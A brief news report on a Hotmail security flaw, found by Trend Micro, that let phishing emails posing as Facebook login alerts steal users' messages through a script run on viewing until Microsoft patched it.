A security flaw in Microsoft's Hotmail left private emails open to theft for a full week, researchers at the security firm Trend Micro reported.
Attackers exploited the Hotmail flaw by sending malicious emails to Hotmail users telling them that someone had logged into their Facebook account "from a computer or device or from a location that you have never used before," Trend Micro wrote on May 13, when it discovered the attack.
The scam message also said that in order to "confirm your account is not hacked, we temporarily locked down your account."
Unlike similar phishing scams that try to scare users into clicking corrupted links — including a recent one focusing on the iPhone 5 — this attack infected users' computers with the corrupted script simply by a user's viewing of it, a cybercrime tool called a " drive-by download."
Once the rogue script made its way into computers, it began automatically stealing Hotmail messages and sending them to the hacker's own email address.
The Hotmail flaw remained active until Microsoft patched it last Friday (May 20), a Trend Micro researcher told Computerworld. The researcher said Trend Micro does not know how long the flaw was present before they discovered it.